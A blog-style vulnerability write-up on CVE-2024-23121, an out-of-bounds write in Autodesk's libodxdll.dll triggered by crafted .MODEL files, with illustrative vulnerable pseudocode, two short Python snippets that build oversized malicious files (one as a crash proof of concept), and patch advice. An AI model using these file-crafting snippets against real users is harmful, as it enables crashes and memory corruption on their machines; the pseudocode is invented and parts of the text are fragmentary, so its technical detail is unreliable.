CVE-2024-23121 - How a Model File Can Hack Your Autodesk Application (Including Exploit Details)

In early 2024, security researchers uncovered a severe vulnerability, tracked as CVE-2024-23121, affecting Autodesk applications that use the libodxdll.dll library. This flaw lets a maliciously crafted .MODEL file trigger an Out-of-Bound (OOB) Write when it's loaded into the software. If exploited, it could lead to a crash, expose sensitive data, or—worse—allow remote code execution on your PC.

This post breaks down CVE-2024-23121 with code snippets, real-world exploit details, and easy-to-understand explanations, so you can see how a hacker might attack and what to do about it.

What Is CVE-2024-23121?

CVE-2024-23121 affects how Autodesk applications parse .MODEL files using libodxdll.dll. A specially crafted file can corrupt memory, letting an attacker:

Run their own code as the user (Arbitrary Code Execution)

Ultimately, opening a malicious .MODEL file could let someone take control of your workstation.

Vulnerable Software

- Products: Autodesk products that use libodxdll.dll for file parsing (Autodesk AutoCAD, DWG TrueView, and others).

Autodesk Security Advisory:

https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0001

MITRE CVE Details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23121

How Does the Vulnerability Work?

The vulnerability exists in the way libodxdll.dll reads fields from a .MODEL file without fully checking their size or bounds before copying data into memory.

The DLL reads a field (e.g., vertex buffer size) from the file.

3. It uses this field as a size for allocating or copying memory, without verifying if it’s within safe limits.

Code Snippet: Vulnerable Pattern _(C-like Pseudocode)_

// Example: Pseudo code inside libodxdll.dll
void parse_model_file(FILE* f) {
    uint32_t data_size;
    fread(&data_size, sizeof(uint32_t), 1, f);   // Read declared size from file

    char buffer[256];
    // BAD: No check if data_size is > 256!
    fread(buffer, 1, data_size, f);              // Out-of-Bounds Write possibility!
}

What’s wrong?
If an attacker puts a data_size of 4096 in the file header, the DLL copies 4096 bytes into a 256-byte buffer—overflowing it.

Sample Malicious File Construction (Python)

# Write a .MODEL file with an overlarge declared size field
with open("exploit.model", "wb") as f:
    data_size = 1024  # Greater than real buffer in DLL
    f.write(data_size.to_bytes(4, 'little'))      # Size field
    f.write(b'A' * data_size)                     # Overflow data

When the target opens this file, libodxdll.dll copies too much data, overwriting memory after the buffer. If positioned right, this can corrupt function pointers or structures, redirecting flow to attacker-controlled data.

A full RCE exploit is complex (and illegal), but a simple POC DoS would look like this

with open('crash.model', 'wb') as f:
    f.write((9999).to_bytes(4, 'little'))  # Wildly oversized data
    f.write(b'A' * 9999)

Just opening this file in a vulnerable Autodesk application can cause an instant crash.

Check for and install all Autodesk security updates.

Patch link: https://knowledge.autodesk.com/support/download-and-install/patches

References

- Autodesk Security Advisory for CVE-2024-23121
- MITRE CVE Description
- NVD entry

Final Thoughts

CVE-2024-23121 shows how even a little slip—like not checking the size of a file field—can lead to full system compromise. For vendors: always validate input. For users: keep your software updated, and never open suspicious files.

Timeline

Published on: 02/22/2024 02:15:49 UTC
Last modified on: 08/01/2024 13:47:05 UTC